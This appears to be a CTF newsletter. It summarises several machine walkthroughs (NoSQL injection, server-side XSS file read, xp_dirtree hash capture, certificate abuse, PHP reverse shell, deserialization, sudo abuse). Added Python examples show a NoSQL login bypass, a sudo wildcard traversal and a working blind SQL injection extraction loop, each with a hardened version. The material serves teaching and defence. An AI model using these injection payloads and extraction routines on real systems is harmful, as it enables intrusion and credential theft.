Newsletter 27/06/2023
This machine has a website that is vulnerable to NoSQL injection. Using this vulnerability, we can bypass authentication. Then, there is a feature that converts HTML output into a PDF, which allows a Server-Side XSS attack to read files from the server, such as the source code. There we find a plaintext password that is reused for SSH. Finally, a user is allowed to run Node.js scripts with sudo from a path that matches a wildcard, and bypassing this wildcard is what is needed to escalate privileges.
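The authentication bypass mentioned above, reduced to its essentials as an added example (this is not the writeup's code nor the machine's real application): a login handler that passes the JSON body straight into a Mongo-style query, a tiny matcher that honours the `$ne`, `$gt` and `$regex` operators the way the real query engine does, and the input-type check that closes the hole. The user records, the matcher and the request bodies are all constructed here and are assumptions.

```python
"""Added example (not from the writeup): NoSQL injection against a login
query, and the type check that blocks it. The "collection", the query
matcher and the request bodies are constructed stand-ins for a real driver."""
import json
import re

# Constructed sample documents, standing in for a MongoDB users collection.
USERS = [
    {"username": "admin", "password": "S3cr3t!"},
    {"username": "alice", "password": "hunter2"},
]


def field_matches(value, cond):
    """Minimal subset of MongoDB query semantics: equality, $ne, $gt, $regex."""
    if isinstance(cond, dict):
        for op, arg in cond.items():
            if op == "$ne":
                if value == arg:
                    return False
            elif op == "$gt":
                if not value > arg:
                    return False
            elif op == "$regex":
                if re.search(arg, value) is None:
                    return False
            else:
                raise ValueError(f"unsupported operator {op}")
        return True
    return value == cond


def find_one(collection, query):
    """Return the first document whose fields all satisfy the query."""
    for doc in collection:
        if all(field_matches(doc.get(k), v) for k, v in query.items()):
            return doc
    return None


def login_vulnerable(body):
    """Passes the decoded JSON values straight into the query, so a client
    that sends an object instead of a string gets its operators honoured."""
    data = json.loads(body)
    user = find_one(USERS, {"username": data["username"], "password": data["password"]})
    return user["username"] if user else None


def login_hardened(body):
    """Same lookup, but anything that is not a plain string is rejected
    before it can reach the query, so operators are never interpreted."""
    data = json.loads(body)
    u, p = data.get("username"), data.get("password")
    if not isinstance(u, str) or not isinstance(p, str):
        return None
    user = find_one(USERS, {"username": u, "password": p})
    return user["username"] if user else None


# Constructed request bodies: a normal login, the classic bypass, and a
# $regex probe that turns the same flaw into character-by-character extraction.
LEGIT = json.dumps({"username": "alice", "password": "hunter2"})
INJECTED = json.dumps({"username": "admin", "password": {"$ne": ""}})
PROBE_HIT = json.dumps({"username": "admin", "password": {"$regex": "^S3"}})
PROBE_MISS = json.dumps({"username": "admin", "password": {"$regex": "^X"}})
```

The `$regex` probe is the reason the fix has to be a type check rather than a blocklist of operator names: any operator that yields a different answer for a true and a false condition is enough to recover the stored value one character at a time.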
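The sudo wildcard bypass mentioned above, as an added example that is not from the writeup: the sudoers line, the script directory and the hardened check are assumptions, and Python's `fnmatch` stands in for the fnmatch(3) call that the sudoers plugin uses when it compares command-line arguments (sudoers(5) documents that, in arguments, a wildcard also matches `/`, which is what makes `..` components slip through).

```python
"""Added example (not from the writeup): why a sudoers entry of the form
    user ALL=(root) NOPASSWD: /usr/bin/node /opt/scripts/*.js
can be satisfied by a script outside /opt/scripts. The rule, the paths and
the hardened variant are assumptions; fnmatch models sudo's argument check."""
import fnmatch
import posixpath

RULE_COMMAND = "/usr/bin/node"      # assumed sudoers command
RULE_ARGS = "/opt/scripts/*.js"     # assumed sudoers argument pattern
SCRIPT_DIR = "/opt/scripts"


def sudoers_allows(command, args):
    """Model of sudo's check: the command path must match exactly, and the
    argument string as a whole must glob-match the pattern. With fnmatch
    a '*' also matches '/', so '/opt/scripts/../../tmp/x.js' is accepted."""
    if command != RULE_COMMAND:
        return False
    return fnmatch.fnmatchcase(" ".join(args), RULE_ARGS)


def stays_inside(path, directory):
    """Lexical containment check: collapse '..' and compare the prefix."""
    norm = posixpath.normpath(path)
    return norm == directory or norm.startswith(directory.rstrip("/") + "/")


def hardened_allows(command, args):
    """What a wrapper script should enforce instead of trusting the glob:
    exactly one argument, which must normalise to a .js file under SCRIPT_DIR.
    A real wrapper should also resolve symlinks (os.path.realpath) first."""
    if command != RULE_COMMAND or len(args) != 1:
        return False
    script = args[0]
    return script.endswith(".js") and stays_inside(script, SCRIPT_DIR)


# Constructed inputs: the intended use and the traversal that the glob accepts.
INTENDED = ["/opt/scripts/backup.js"]
TRAVERSAL = ["/opt/scripts/../../tmp/evil.js"]   # '*' swallows '../../tmp/'
```

Listing the permitted scripts by their exact paths in sudoers avoids the problem entirely; the wrapper check is for the case where a wildcard genuinely is needed.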
This machine shares a PDF file via SMB that contains credentials for Microsoft SQL Server. With them, we are able to use xp_dirtree to make the server connect to an SMB share we control, which yields an NTLMv2 hash that we crack. After that, we can access the machine, read the Microsoft SQL Server logs and discover the password of another user. Then, we find some vulnerable certificate templates that can be abused to authenticate as Administrator.
This machine contains a Tiny File Manager application that allows us to upload and execute PHP, so we can obtain a reverse shell as www-data. On the machine, we can read the nginx configuration and find another subdomain. This one exposes a WebSocket server that is vulnerable to Boolean-based Blind SQLi. By exploiting the SQLi, we can find plaintext credentials that are reused for SSH. Finally, the user is allowed to run dstat as root using doas, and we are able to create a dstat plugin to escalate privileges.
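Boolean-based blind extraction through a handler that only ever answers true or false, as an added example (this is neither the writeup's code nor the machine's real service): an in-memory sqlite3 table stands in for the database, the schema and the stored credential are constructed, and the message format is an assumption. The loop is the general technique; `substr`/`unicode` would be swapped for the equivalents of whatever DBMS sits behind the WebSocket.

```python
"""Added example (not from the writeup): Boolean-based blind SQL injection
through a lookup that returns only a boolean. sqlite3 in memory stands in
for the real database; the table, the secret and the handler are assumptions."""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript(
    "CREATE TABLE users(username TEXT, password TEXT);"
    "INSERT INTO users VALUES ('admin', 'Winter2023!');"   # constructed data
)


def handle_vulnerable(username):
    """Server side: formats the message into the query and answers True/False."""
    sql = f"SELECT 1 FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchone() is not None


def handle_hardened(username):
    """Same lookup with a bound parameter; the input cannot alter the query."""
    row = conn.execute("SELECT 1 FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None


def oracle(handler, condition):
    """Client side: wrap an arbitrary SQL condition so that the handler's
    boolean answer becomes the truth value of that condition."""
    return handler(f"admin' AND ({condition}) AND '1'='1")


def extract(handler, expr, max_len=64):
    """Recover the string value of the SQL expression expr one character at a
    time, binary-searching the code point of each position (7 queries/char)."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(handler, f"length({expr}) >= {pos}"):
            break                      # ran past the end of the value
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(handler, f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


PASSWORD_EXPR = "(SELECT password FROM users WHERE username = 'admin')"
```

Against the hardened handler the same loop returns an empty string: the whole payload is compared as a literal username, so the length probe for position 1 is already false.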
This machine has a website that is vulnerable to Local File Read. With this, we can read the web application source code and see that there is a WebSocket server written in C# .NET that uses a DLL to process the messages. We can download the DLL and decompile it to read the C# source code. The program deserializes JSON data, and there is a flaw that allows us to reuse a class of the codebase to read arbitrary files from the server. With this, we can read the private SSH key of a user, and then switch to another user with a password that is also stored in the DLL. This user is able to run dotnet with sudo, which can be used to escalate privileges.
Score modification
Kernel exploitation. Heap exploitation. seq_operations. ret2user
HTML code inspection
Python jail. Oracle